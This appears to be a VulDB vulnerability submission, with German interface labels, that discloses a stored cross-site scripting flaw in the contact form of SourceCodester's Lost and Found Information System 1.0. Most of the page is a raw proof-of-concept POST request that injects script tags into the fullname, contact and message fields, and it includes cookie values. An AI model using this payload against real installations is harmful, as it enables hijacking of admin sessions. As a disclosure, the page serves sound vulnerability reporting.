Submit #155183: Stored XSS in Lost and Found Information System 1.0 View message send from contact forminfo

TitelStored XSS in Lost and Found Information System 1.0 View message send from contact form
BeschreibungDetail: Stored XSS in Lost and Found Information System 1.0 in admin View message send from contact form Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html Production: Lost and Found Information System Version: 1.0 Request: POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3651031312771010866996354889 Content-Length: 839 Origin: http://localhost Connection: close Referer: http://localhost/php-lfis/?page=contact Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="id" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="visitor" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="fullname" Tuan"><script>alert('1')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="email" [email protected] -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="contact" Tuan"><script>alert('2')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="message" Tuan"><script>alert('3')</script> -----------------------------3651031312771010866996354889-- View effect: /php-lfis/admin/?page=inquiries/view_inquiry&id=2
Quelle⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Benutzer
 huutuanbg97 (UID 45015)
Einreichung11.05.2023 15:33 (vor 3 Jahren)
Moderieren12.05.2023 08:01 (16 hours later)
StatusAkzeptiert
VulDB Eintrag228887 [SourceCodester Lost and Found Information System 1.0 Contact Form Master.php?f=save_inquiry fullname/contact/message Cross Site Scripting]
Punkte20

ZurückÜbersichtWeiter

Interested in the pricing of exploits?

See the underground prices here!